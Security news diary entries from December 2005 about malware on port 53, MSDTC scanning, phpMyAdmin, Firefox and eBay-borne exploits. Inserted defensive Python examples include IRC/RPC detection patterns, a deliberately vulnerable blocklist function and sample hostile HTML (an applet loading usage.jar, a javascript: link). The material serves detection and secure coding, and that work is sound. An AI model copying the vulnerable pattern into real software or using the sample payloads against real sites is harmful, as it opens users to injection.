Handler Patrick N. pointed out that port 53 has made a comeback as of late, with the release of W32.Spybot.ABDO.  Symantec's write-up points out that Spybot.ABDO "Opens a back door by connecting to an IRC server on the following domain through TCP port 53".  Looking at the Port 53 Report using DShield data, the number of targets has more than doubled in the past ~48 hours.
Something to keep in mind is that this time there may be several unscrupulous activities using port 53.  Other malware discovered in recent months that uses port 53 includes Backdoor.Civcat, Trojan.Esteems.C, Trojan.Esteems, and W32.Beagle.BH@mm.
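The detection angle on the above is that an IRC session to TCP/53 is not DNS, whatever port it uses, and that is something a sensor can tell from the first bytes of the flow. The following is an added example, not code from the diary or from Symantec, that classifies port 53 flows by whether the payload parses as a DNS message and whether it starts with an IRC command verb. The flow records are constructed sample data; the field names (`src`, `dst`, `proto`, `dport`, `payload`) are assumptions about what your collector hands you, and the IRC nick format is a made-up sample, not a signature for the family named above.

```python
import re
import struct

# First line of an IRC client session: optional prefix, then a command verb.
IRC_COMMAND = re.compile(rb"^(?::\S+ )?(NICK|USER|PASS|JOIN|PRIVMSG|PING|PONG|MODE)\b", re.I)


def build_dns_query(name, txid=0x1234):
    """Minimal DNS A query for `name` (wire format, no length prefix)."""
    labels = b"".join(bytes([len(part)]) + part.encode() for part in name.split("."))
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, one question
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE A, QCLASS IN


def dns_over_tcp(message):
    """DNS over TCP prefixes each message with its 2-byte length (RFC 1035 4.2.2)."""
    return struct.pack("!H", len(message)) + message


def plausible_dns(payload, proto):
    """Cheap structural check: does this payload parse as a DNS message?"""
    if proto == "tcp":
        if len(payload) < 2:
            return False
        (length,) = struct.unpack("!H", payload[:2])
        if length != len(payload) - 2:        # assumes the whole first message is present
            return False
        payload = payload[2:]
    if len(payload) < 12:
        return False
    _txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", payload[:12])
    opcode = (flags >> 11) & 0xF              # QUERY, IQUERY, STATUS, NOTIFY, UPDATE
    return opcode in (0, 1, 2, 4, 5) and qd <= 16 and an + ns + ar <= 512


def classify_port53(flow):
    """Return None for traffic that looks like DNS, else a reason to alert."""
    if flow["dport"] != 53:
        return None
    payload = flow["payload"]
    if IRC_COMMAND.match(payload):
        return "irc-command-on-port-53"
    if not plausible_dns(payload, flow["proto"]):
        return "non-dns-payload-on-port-53"
    return None


def scan_flows(flows):
    """Run the classifier over a batch of flow records; returns alert tuples."""
    alerts = []
    for flow in flows:
        reason = classify_port53(flow)
        if reason:
            alerts.append((flow["src"], flow["dst"], reason))
    return alerts


# Constructed sample flows (not captured data): a real DNS-over-TCP query to
# the local resolver, a UDP query, and an IRC login sent to TCP/53 on an
# outside host, which is the pattern the write-up describes.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "10.0.0.53", "proto": "tcp", "dport": 53,
     "payload": dns_over_tcp(build_dns_query("example.com"))},
    {"src": "10.0.0.6", "dst": "10.0.0.53", "proto": "udp", "dport": 53,
     "payload": build_dns_query("example.net")},
    {"src": "10.0.0.7", "dst": "203.0.113.9", "proto": "tcp", "dport": 53,
     "payload": b"NICK [00|USA|283101]\r\nUSER sp00l 0 0 :sp00l\r\n"},
]

if __name__ == "__main__":
    for alert in scan_flows(SAMPLE_FLOWS):
        print(*alert)
```

Two caveats for production use: the TCP length check assumes the collector gives you the complete first DNS message, so on truncated captures drop that test and rely on the header fields; and the strongest signal in the original report is not the payload at all but the destination, since internal hosts should only be talking to the resolvers you run, so an egress rule for TCP/53 to arbitrary addresses is the cheaper control.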

Any thoughts welcome.....


Published: 2005-12-11

Port 1025/6000 Action (Part II)

As reported by Koon Tan yesterday we have seen, and are continuing to see, increased activity reported by more users now.  The link below will show a graph that indicates activity over the past ~72 hours.


We still need full packet captures to help nail this down, so if anybody has them please submit them via the 'Contact' link at the top of the page.

Core Security Technologies has an excellent article on this subject and RPC vulnerabilities.  One highlight from this article is that the "patches for these vulnerabilities ..... effectively fix the problem(s)" with the vulnerabilities used in the discussion.  All of the vulnerabilities are more than 18 months old; these fixes have been out for some time, giving admins plenty of time to test and load said patches.


Published: 2005-12-10


1) One reader submitted a malware sample which, after being run through VirusTotal, was detected as a Linux backdoor:
Ikarus    12.10.2005    Backdoor.Perl.Whoredoor.08
Kaspersky    12.10.2005    Rootkit.Linux.Matrics.sk
McAfee    4647    12.09.2005    Linux/BackDoor

2) On another note, Juha-Matti has pointed out an interesting Trojan.Spaxe. The interesting part is that it will display a balloon message, attempting to appear to come from the Windows Automatic Updates icon in the System Tray, with the following text:

"Your computer is infected!
Windows has detected spyware infection.

It is recommended to use special antispyware tools to prevent data loss.
Windows will now download and install the most up-to-date antispyware for you.

Click here to protect your computer from spyware."

Clicking on the balloon will result in downloading a file from the Internet.

3) You may have read in the news that there will be a Sober worm attack on 5 Jan 06. This is due to the pre-programmed date on which the current Sober variant activates, 5 Jan 06. The interesting part is that the Sober variant has the intelligence to create pseudorandom URLs which change based on the date. It can also synchronize the time via atomic clocks, so it does not matter if the system clock is not correct. F-Secure has come out with a list of URLs that you may want to block. You can read the details in F-Secure's nice writeup.

[Update to (3)]
On another note, LURHQ has a writeup on the key dates in the various Sober variants. It mentions that the Sober.Y activation date should be after 5 Jan 06. The logic is "current date > Jan 5" and not "current date == Jan 5". Thanks to Dominic for pointing this out.


Published: 2005-12-10

Ethereal Vulnerability

iDefense has published an advisory on the Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability. Successful exploitation of the vulnerability will result in a DoS and may allow the execution of arbitrary code under certain conditions. For more details, please refer to the iDefense advisory. Thanks to Juha-Matti.


Published: 2005-12-10

Increase in Port 1025 scan

We have received a report of TCP port 1025 scans. David observed an increase in port 1025 scanning and submitted some packet captures to us. The captured packet contains a request to interface UUID 906b0ce0-c70b-1067-b317-00dd010662da and the BuildContextW (opnum 7) RPC function. Part of the packet payload resembles the MSDTC exploit. This appears to be exploiting the MS05-051 vulnerability as described in the eEye advisory. If you have seen similar activity, do drop us a note.
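The two things that identify the capture above are the interface UUID in the DCE/RPC bind and the opnum in the request that follows. The following is an added example, not code from the diary, from eEye or from any IDS project, that parses those two PDU types with Python's standard library so the pair can be matched on a connection. The interface UUID and opnum are the ones quoted in the entry; the PDU builders exist only to construct sample data in the same wire format (fragment sizes, association group and the NDR transfer syntax UUID are standard values assumed for the sample), and the request stub is zero-filled, so nothing here reproduces the captured payload.

```python
import struct
import uuid

# Interface UUID and opnum named in the diary entry above.
MSDTC_IFACE = uuid.UUID("906b0ce0-c70b-1067-b317-00dd010662da")
BUILDCONTEXTW_OPNUM = 7
# NDR transfer syntax, used here only to build a well-formed sample bind.
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
PTYPE_REQUEST, PTYPE_BIND = 0, 11


def parse_dcerpc(pdu):
    """Parse a connection-oriented DCE/RPC v5 PDU. For a bind return the
    abstract interfaces requested; for a request return the opnum."""
    if len(pdu) < 16:
        raise ValueError("short PDU")
    drep = pdu[4:8]
    e = "<" if drep[0] & 0x10 else ">"   # data representation flags: integer byte order
    vers, _vers_minor, ptype, _flags = struct.unpack("BBBB", pdu[:4])
    frag_len, _auth_len, call_id = struct.unpack(e + "HHI", pdu[8:16])
    if vers != 5 or frag_len != len(pdu):
        raise ValueError("not a DCE/RPC v5 PDU or truncated fragment")
    info = {"ptype": ptype, "call_id": call_id}
    body = pdu[16:]
    if ptype == PTYPE_BIND:
        n_ctx = body[8]                  # after max_xmit, max_recv, assoc_group
        off = 12
        ifaces = []
        for _ in range(n_ctx):
            _ctx_id, n_ts = struct.unpack(e + "HBx", body[off:off + 4])
            raw = body[off + 4:off + 20]
            # On the wire the first three UUID fields follow drep byte order.
            iface = uuid.UUID(bytes_le=raw) if e == "<" else uuid.UUID(bytes=raw)
            major, minor = struct.unpack(e + "HH", body[off + 20:off + 24])
            ifaces.append((iface, major, minor))
            off += 24 + 20 * n_ts        # skip the transfer syntaxes (16 + 4 each)
        info["interfaces"] = ifaces
    elif ptype == PTYPE_REQUEST:
        _alloc_hint, ctx_id, opnum = struct.unpack(e + "IHH", body[:8])
        info["context_id"], info["opnum"] = ctx_id, opnum
    return info


def detect_msdtc_buildcontext(pdus):
    """Given the client PDUs of one connection in order, return True when a
    bind to the MSDTC interface is followed by a BuildContextW request."""
    bound = False
    for pdu in pdus:
        info = parse_dcerpc(pdu)
        if info["ptype"] == PTYPE_BIND:
            bound = any(iface == MSDTC_IFACE for iface, _, _ in info["interfaces"])
        elif info["ptype"] == PTYPE_REQUEST and bound and info["opnum"] == BUILDCONTEXTW_OPNUM:
            return True
    return False


# --- sample-data builders (constructed, little-endian, no auth trailer) ---
def _header(ptype, body_len, call_id):
    return struct.pack("<BBBB4sHHI", 5, 0, ptype, 0x03, b"\x10\x00\x00\x00",
                       16 + body_len, 0, call_id)


def build_bind(iface, major=1, minor=0, call_id=1):
    ctx = (struct.pack("<HBx", 0, 1) + iface.bytes_le + struct.pack("<HH", major, minor)
           + NDR_SYNTAX.bytes_le + struct.pack("<I", 2))
    body = struct.pack("<HHIB3x", 5840, 5840, 0, 1) + ctx
    return _header(PTYPE_BIND, len(body), call_id) + body


def build_request(opnum, stub=b"", call_id=2):
    body = struct.pack("<IHH", len(stub), 0, opnum) + stub
    return _header(PTYPE_REQUEST, len(body), call_id) + body


# Constructed connection shaped like the one described: bind, then opnum 7
# with an inert zero-filled stub (not the captured exploit data).
SUSPECT_CONNECTION = [build_bind(MSDTC_IFACE), build_request(BUILDCONTEXTW_OPNUM, b"\x00" * 16)]

if __name__ == "__main__":
    print("MSDTC BuildContextW seen:", detect_msdtc_buildcontext(SUSPECT_CONNECTION))
```

Treat a match as a trigger for full packet capture or a stricter IDS rule rather than a verdict: legitimate MSDTC clients bind this interface and call BuildContextW too, so the useful combination is this match plus a source outside the network and a destination that should not be exposing port 1025 at all, as the entry's call for captures suggests.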


Published: 2005-12-09

Microsoft advanced bulletin

Next week Microsoft will be releasing two security patches, which may be critical, and may require a restart. One of which may or may not be the unpatched Internet Explorer vulnerability reported by us here:
IE 0 Day
The Microsoft Advanced Bulletin is here:
They will also be updating the Malicious Software Removal Tool and releasing two non-security updates.

Adrien de Beaupre
Handler of the Day
Cinnabar Networks Inc.


Published: 2005-12-08

Vulnerabilities in phpMyAdmin, Dell's TrueMobile 2300 Wireless Router and couple of PoC exploits.

An otherwise slow day was interrupted by a small flood of vulnerability advisories and exploits. Be sure to patch your systems if you use any of the products mentioned below.

Stefan Esser published a critical vulnerability in phpMyAdmin, a popular web-based MySQL administration package. What's interesting about this vulnerability is that it is, in fact, in the code which should protect the application.
The variable $import_blocklist is supposed to list variables that may not be overwritten. However, as this variable is not itself protected, an attacker can overwrite it and change the blocklist, after which this can be exploited to execute arbitrary script code in the user's browser session, in the context of the site running a vulnerable installation of phpMyAdmin.
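The flaw is a general one: a protection list that lives in the same writable namespace as the data it protects can be replaced by that data. The following is an added example, not phpMyAdmin's code and not from the advisory, that shows the mechanism in Python with a toy "import request variables" loop beside a hardened form. The names (`cfg`, `import_blocklist`, `GLOBALS`) echo the entry; the request contents and the config values are constructed, and the consequence shown is a configuration overwrite rather than the script injection the advisory describes, because the point is how the blocklist is bypassed, not what is done afterwards.

```python
# Names that a request must never be allowed to replace. Listing the
# blocklist's own name is the fix the advisory's description implies.
IMPORT_BLOCKLIST = frozenset({"cfg", "GLOBALS", "import_blocklist"})


def import_request_vulnerable(namespace, request):
    """The flawed pattern: the blocklist is itself an entry of the namespace
    being written, and is re-read on every iteration, so a request that
    supplies 'import_blocklist' first disables protection for what follows."""
    for name, value in request.items():
        blocklist = namespace.get("import_blocklist", [])
        if name in blocklist:
            continue
        namespace[name] = value
    return namespace


def import_request_hardened(namespace, request):
    """The blocklist is an immutable constant fixed before the loop and names
    itself; imported values are also kept apart from configuration, so even a
    future blocklist omission cannot reach `cfg`."""
    imported = {}
    for name, value in request.items():
        if name in IMPORT_BLOCKLIST:
            continue
        imported[name] = value
    namespace["request"] = imported
    return namespace


def demo():
    """Constructed inputs: a server config and a request that first replaces
    the blocklist and then a protected name. Returns what each variant ends
    up using as the database host, plus what the hardened import accepted."""
    base = {"cfg": {"Servers": [{"host": "db.internal"}]},
            "import_blocklist": ["cfg", "GLOBALS"]}
    request = {"import_blocklist": [],
               "cfg": {"Servers": [{"host": "attacker.invalid"}]},
               "page": "1"}
    vuln = import_request_vulnerable(dict(base), request)
    safe = import_request_hardened(dict(base), request)
    return (vuln["cfg"]["Servers"][0]["host"],
            safe["cfg"]["Servers"][0]["host"],
            sorted(safe["request"]))


if __name__ == "__main__":
    print(demo())
```

The ordering matters in the vulnerable variant only because the check is re-evaluated on each iteration; the underlying defect is that untrusted input and the policy that filters it share one mutable namespace. Not importing request variables into application globals at all removes the whole class of bug, which is why the hardened version hands them back as a separate dictionary.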

If you use this product, be sure to upgrade to phpMyAdmin 2.7.0-p1 from http://sourceforge.net/project/showfiles.php?group_id=23067. The original advisory is at http://www.hardened-php.net/advisory_252005.110.html.

Thanks to Richard for sending the note!

Besides this, iDefense published an advisory about a design error in Dell's TrueMobile 2300 Wireless Broadband Router. By accessing a certain page it is possible to obtain another page which will allow an attacker to reset authentication credentials.
It was reported that the following firmware versions are affected:
*, dated 07/24/2003
*, dated 1/31/2004

Dell stated that this product is no longer being sold and that it was replaced with newer models which are not affected by this vulnerability, so no patch will be released.
We wonder if you can go and return the device for a new one - let us know if you try to do this.

Finally, PoC exploits for some old vulnerabilities have been released.

The first one is for a two-year-old Oracle 9i vulnerability, the XDB HTTP Authentication Remote Stack Overflow Exploit. You can find more information about the vulnerability at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727.

The second exploit was for HP OpenView Network Node Manager Remote Command Execution vulnerability. connectedNodes.ovpl, a script that comes with HP OpenView, had inadequate input validation so an attacker was able to execute arbitrary system level commands. HP released the patch for this vulnerability on 5th of October; their original advisory is available at http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01224.


Published: 2005-12-08

First Vulnerability for Firefox 1.5 (released version) Announced - PoC available

When Firefox 1.5 was officially released I wondered when the first security vulnerability would be announced.  To be fair, it's taken longer than I thought it would.  Packetstorm Security has released proof of concept code that causes a buffer overflow and denial of service in the Firefox browser.  The long and short of it is that history.dat stores various pieces of information on websites you've visited.  If the topic of a page is crafted to be long enough, it will crash the browser each time it is started after going to such a page.  This vulnerability has been tested and does work, and no known patches are available at this time.  Once this happens, Firefox will be unable to start until you erase the history.dat file manually.  Presumably, if the topic was more tightly crafted than in the proof-of-concept code, a more malicious attack could be crafted that would install malware on the machine, with the extra fun step of being reinstalled after each restart of Firefox (unless you erase history.dat).

As we research this more, details will be added on to this post.


The machine I was testing this on has McAfee Enterprise 8, and Firefox would not crash.  Despite my valiant efforts in disabling the protection, I couldn't get it to crash.  While annoyed that I couldn't (short of uninstalling) get the protection disabled, it probably is a good thing.  I'll test more when I get in the office tomorrow and have more machines to play with.

This seems to be more of a denial of service than a true buffer overflow.  It looks like Firefox just chokes on page topics that are too long.  For some people it hangs, for others it crashes.


However, the following is a workaround that should work (if it doesn't, let me know).  Go to Tools -> Options.

Select the Privacy Icon, and then the History tab.  Set the number of days to save pages at 0.  This will disable writing anything to history.dat as far as I can tell, and should nullify the exploit.  Readers have confirmed that this workaround does prevent the buffer overflow.  You can also change your privacy settings to delete personal info when you close Firefox.

Another workaround is to modify prefs.js while Firefox has not been started and put in the line:


Lastly, you can also run the NoScript extension, found here.  (Which I have not looked at in depth.)  However, there are other ways of exploiting this where NoScript might not work.

Some users have reported being unable to reproduce this error.  I will test more to try to establish what makes this work and not.  So far it appears Mac users are not affected by this.


If you need to delete your history.dat file (in case you tested this PoC code), it can be difficult to locate where exactly this file is.
You can find instructions for locating the profile folder at the following URL: http://www.mozilla.org/support/firefox/edit#profile.

John Bambenek, bambenek *at* gmail *dot* com


Published: 2005-12-07

Malware, eBay, and You.

ISC reader Gareth Attrill pointed us to an eBay auction that has some escaped HTML code that sneaks in a link that tries to get a trojanized .jar (usage.jar) file loaded on the machine of anyone who views the listing.  The latest .dat for McAfee immediately detected (and deleted) the code as Exploit-ByteVerify.  The lister most likely managed to bypass other protections that otherwise prevent this kind of code from being inserted into item listings.  Both eBay and the ISP that is hosting the malware have been notified.

The impact of this kind of attack is probably small, but it does present an interesting new vector for tricking users into going to locations that include the standard class of passive web browser exploits.  Something like this using code that wasn't immediately known to the AV vendors and using an item that was very popular (say an XBOX 360 at release) could create a situation ripe for widespread exploitation. 

Any site that allows users to enter HTML or images could theoretically be misused this way, which illustrates the importance of validating end-user input, both in restricting what users can put in and, in the case of images, in checking that there are no exploits in the image files.  These checks need to be repeated, instead of checking only when content is entered, so that new DATs can examine existing files that may have gotten in before the new DATs were deployed.
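The two controls the paragraph above asks for are an allowlist on what user-supplied markup may contain and a re-scan of stored content when detection improves. The following is an added example, not eBay's code and not from any library, that implements both with Python's standard library: a rebuild-from-allowlist sanitizer (anything not listed, including applet, object, embed, script and event-handler attributes, is dropped and logged) and a helper that re-runs an arbitrary scanner over already-accepted listings. The allowed tag set, the sample listing and the scanner stand-in are constructed assumptions; the `usage.jar` name in the sample echoes the entry.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist of tags a listing may use, each with the attributes it may carry
# (an assumption for this example; a real site tunes this to its templates).
ALLOWED_TAGS = {
    "p": set(), "br": set(), "b": set(), "i": set(), "ul": set(), "li": set(),
    "a": {"href"}, "img": {"src", "alt"},
}
VOID_TAGS = {"br", "img"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}


class ListingSanitizer(HTMLParser):
    """Rebuild markup from the allowlist; everything else is dropped or
    becomes inert text. Unknown tags are never passed through."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []
        self.dropped = []        # what was removed, for logging and review

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)                 # applet, object, embed, script, iframe ...
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag] or value is None:
                if name.startswith("on"):
                    self.dropped.append(f"{tag}@{name}")   # event handler attribute
                continue
            if name in URL_ATTRS and urlparse(value.strip()).scheme.lower() not in SAFE_SCHEMES:
                self.dropped.append(f"{tag}@{name}")       # javascript:, data:, relative ...
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.parts.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        # Entities were decoded on input; re-escape so smuggled text cannot
        # turn into markup when the listing is rendered.
        self.parts.append(escape(data))


def sanitize_listing(markup):
    """Return (clean_html, dropped_items) for one listing body."""
    parser = ListingSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.parts), parser.dropped


def rescan_stored(listings, scanner):
    """Re-run `scanner` (a callable returning a detection name or None, e.g.
    an AV engine with today's signatures) over listings accepted earlier.
    Returns (listing_id, detection) pairs for anything now flagged."""
    hits = []
    for listing_id, body in listings.items():
        detection = scanner(body)
        if detection is not None:
            hits.append((listing_id, detection))
    return hits


# Constructed sample listing: benign formatting with an applet, a javascript:
# link and an event handler mixed in.
SAMPLE_LISTING = ('<p>Mint <b>XBOX 360</b><applet code="Loader" archive="usage.jar"></applet> '
                  '<a href="javascript:alert(1)">photo</a> '
                  '<img src="http://img.example.invalid/x.jpg" onerror="run()"></p>')

if __name__ == "__main__":
    clean, dropped = sanitize_listing(SAMPLE_LISTING)
    print(clean)
    print("dropped:", dropped)
```

The sanitizer deliberately does not try to "fix" bad input by editing it in place; it emits only what it recognises, so a new bypass has to get past the allowlist rather than around a blocklist. Relative URLs are dropped here because the scheme is empty; if your listings legitimately link to your own pages, resolve them against the site origin first and then apply the same scheme check. For uploaded images the sanitizer is not enough, which is what `rescan_stored` is for: keep the originals and run them through the scanner again whenever signatures change.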

John Bambenek, bambenek *at* gmail *dot* com


Published: 2005-12-07

What? No URL?

The scenario goes something like this:  We get information that there is a potentially malicious site doing some not so nice things.  After investigating and working to figure out what is going on, we finally post an entry to let people know that there is an evil site out there and exactly what you will get if you visit that site. (Yes, we also report it to try to get it taken down.) Well, for most people, that's enough, but for others there is an insatiable urge to know exactly where that site is located, which prompts an email to us asking that very question.   There are all sorts of reasons why people want to know where the site is, and my reason for writing this is not to belittle any of them, as many of them are valid.   It's actually to try to set the record straight on why we try to avoid posting the URL to sites that are doing malicious things.  Here are a couple of reasons:

First, for some unknown reason, it is in our human nature to want to click on anything clickable!  Maybe it's the rebel in us all, a form of expression.  Regardless of who you are, we all click on URLs, especially on sites that we trust.  How many viruses have you had to fight off at your organization from users clicking on links in email they got?  Well, we don't want to contribute to that infection rate.  However, if you are one of the very few, who could probably be counted on one hand, who actually types every single URL, my hat's off to you!!  But for the rest of us, we don't post the URL to malicious sites, to help protect folks from themselves and that insatiable urge to click on things.     If we were to point users to a URL which has malware on it like (Don't click on that link) then there is a chance a security minded user could accidentally click the link while copying it to an email or another window.  Whether you're a newbie or an oldie, accidents do happen.

Second (you'll need to think devious), if you are a bad guy and you want to stay up on some of the latest exploits, or if you have done some exploiting and wonder if someone is on to you, where would you look?  Well, major security sites with forums would be a good start.  A place where you can see the latest happenings as they are posted.   Since good guys as well as bad guys visit our site, we don't post the links, to keep the "bad guys" from getting their hands on new malware or pointers to the latest exploit code.   The last thing we want to do is to help further their endeavors.  Sure, if they want it they can probably find it, but we're not going to make it easy for them and they'll have to get it somewhere else.  We all need to be responsible with what we post and make available.  Things that can be used for good can be used for evil as well.

Hopefully this clears things up for folks as to why we don't post the full URL to malicious sites, or post the links to exploit code for that matter.  We really enjoy helping everyone, and part of that is protecting everyone who visits the site.


Published: 2005-12-05

New AIM worm

Malware authors just opened their own holiday season. We received a couple of reports of a new AIM worm spreading.
The worm is simple and doesn't exploit any vulnerability; instead it relies on social engineering.

The user will receive the following AIM message:

"This AIM user has sent you a Greetings Card, to open it visit: http://greetings.aol.com/index.pd?source=christmastheme?my_christmas_card.COM"

Instead of going to AOL's site, this link actually points to a different site (http://<REMOVED>.<REMOVED>.134.156/My_Christmas_Card.COM) from which the user will download the worm.
This file is a SDBot variant and at the moment the most popular AV programs detect it generically.

Thanks to Joshua!


Published: 2005-12-05

Malware Analysis Quiz 5

For those following my quizzes, today I released the results of the previous one and already posted the new one, the Malware Analysis Quiz 5. Take a look and submit your answers!
Thanks for all the feedback received!
Pedro Bueno (pbueno //&&// isc. sans. org)


Published: 2005-12-03

Cisco Response to OpenSSL Vulnerability

Cisco has released a Security Notice in response to the OpenSSL vulnerability discovered on Oct 05. It details the affected products and fixed release dates. You can find the information at:


Published: 2005-12-03

Reports on IE exploit

There are a few reports indicating websites exploiting the IE vulnerability that currently has no patch. If you come across any such websites, do drop us a note.


Published: 2005-12-03

SANS 2006

If you are a developer, Oracle programmer or website manager and wish to get security training to improve your system security, there are a few classes designed for you for the upcoming SANS 2006. The classes include Secure Programming, Securing Oracle and Developing a Secure Internet Presence. You can find more details at:


Published: 2005-12-02


Ever wondered what to do with the XML output of an NMAP scan?  Me too.  Until I realized that you can easily parse it with a Perl module named NMAP::Parser.  More information and an example script that will be useful to all the security gurus who code in Perl on my page here: http://handlers.sans.org/khaugsness/

Let me know if you find this useful.


Published: 2005-12-02

Random stuff from the mailbag

There wasn't anything big enough to comprise a full story today, but there are lots of small items to mention:

1) Criminal groups are starting to exploit the (still unpatched) IE vulnerability.  This could get ugly soon.

2) Update: Several people have reported that a patch is now available, so patch now!...  There is a very serious bug in most Panda antivirus products that seems to still be unpatched.  This was announced several days ago.  Possible mitigation is to block .zoo attachments at your network entry points (email and web browsing).  Of course, you might be in trouble if Panda *is* your mail filtering server.

3) One person reported that Google now allows Gmail functionality to run on www.google.com.  This change caused his web filtering software company to categorize www.google.com as webmail.  And since his organization doesn't allow webmail access, users were blocked from google.  Did anybody else run into this problem?


Published: 2005-12-01

Cyber extortion. Podcast-style.

A reader wrote in with this interesting news story from eWeek.

Raises some interesting questions regarding RSS (security, intellectual property, etc).
(Thanks Eric.)


Published: 2005-12-01

Determining Sun Java Vulnerability

A number of folks in the community have written in describing their experiences determining if they are vulnerable to the Java issue mentioned previously.
It appears that depending on your platform/configuration the sunjavaupdate scheduler may not apply the updates or notify the end-user in a timely manner. It appears to check for updates on the one month anniversary of the original install. So it may not check again for quite some time.
The Sun Java download site will determine if an update is needed if you're using IE and ActiveX:

Also the JavaTester site details all the different methods for determining what if any JDK/JRE is installed:

Also be aware many systems accumulate Java versions over time so you may have more than one installed.


Published: 2005-12-01

Musings on the Internet Explorer 0-day vulnerability

So are any of you like me with regard to the Internet Explorer vulnerability mentioned last week http://isc.sans.org/diary.php?storyid=874? I know that I am watching and waiting to see if Microsoft is going to release an out of cycle patch, or wait for December 13th patch day.  If I were a gambler, I might actually bet on Microsoft releasing it early.

Why do I think this way?  Well.... Glad you asked.

Yesterday, Microsoft updated the advisory located at KB911302 with a couple of tidbits.  First, they made mention of both Proof of Concept and malicious software which appear to be targeting the reported vulnerability.  Second, they also mention the Windows Live Safety Center, where end users can scan for and remove any malicious software and variants that may be running around now.

Throwing in that Microsoft has on occasion released out-of-cycle patches (June 2004 is a case in point in my mind), then I think it is a safe bet that Microsoft will take appropriate steps to fix the problem as quickly as possible.  In the meantime there are 2 things I can continue to suggest.

1) Be vigilant.  Know that a patch will be forthcoming hopefully within the next 2 weeks and be ready to deploy quickly.

2) If your organization can operate with one of the workarounds Microsoft has mentioned in KB911302, then I recommend mitigating your risk as much as possible.  We all have at least one person who is a little too...uhm...liberal with browsing the Internet on company time.  Think about it, that very person is probably shopping for Christmas* presents right now on less-than-secure sites.  SO....I would suggest doing those workarounds to that computer first.  :-)

* For those that celebrate other holidays in December than Christmas, this statement is not meant to be offensive in any shape or form, or otherwise slight your holiday of choice.


It was just a question of when malware authors would start exploiting this Internet Explorer vulnerability.
When users visit certain web sites, a file will be dropped on their machine using this exploit. The file being dropped is currently detected as TrojanDownloader:Win32/Delf.DH. When executed, this dropper will download another trojan.

Microsoft published information about this trojan at http://www.microsoft.com/security/encyclopedia/details.aspx?name=TrojanDownloader:Win32/Delf.DH.

Thanks to Juha-Matti!